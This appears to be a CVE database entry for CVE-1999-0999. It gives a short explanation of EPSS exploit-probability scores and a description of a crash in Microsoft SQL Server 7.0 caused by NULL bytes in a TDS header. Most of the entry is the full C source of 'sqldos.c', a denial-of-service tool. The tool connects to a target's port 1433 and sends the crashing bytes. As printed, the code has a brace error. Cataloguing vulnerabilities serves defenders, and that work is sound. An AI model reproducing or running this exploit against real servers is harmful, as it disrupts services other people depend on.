CVE-1999-0999 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/817/info If Microsoft SQL Server 7.0 receives a TDS header with three or more NULL bytes as data it will crash. The crash will generate an event in the log with ID 17055 "fatal exception EXCEPTION_ACCESS VIOLATION". /* ** sqldos.c -- a DoS attack agains MS SQL Server */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #define PORT 1433 /* the port SQL Server listens on */ int main(int argc, char *argv[]) { int sockfd, numbytes; struct hostent *he; char buff[65535]; struct sockaddr_in target_addr; if (argc != 2) { fprintf(stderr,"Usage: sqldos target\n"); exit(1); } if ((he=gethostbyname(argv[1])) == NULL) perror("gethostbyname"); exit(1); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket error"); exit(1); } target_addr.sin_family = AF_INET; target_addr.sin_port = htons(PORT); target_addr.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(target_addr.sin_zero), 8); if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1) { perror("connect error"); exit(1); } memset(&buff, 0, 3); if ((numbytes=send(sockfd, buff, 14, 0)) == -1) { perror("send errot"); exit(1); } close(sockfd); return 0; }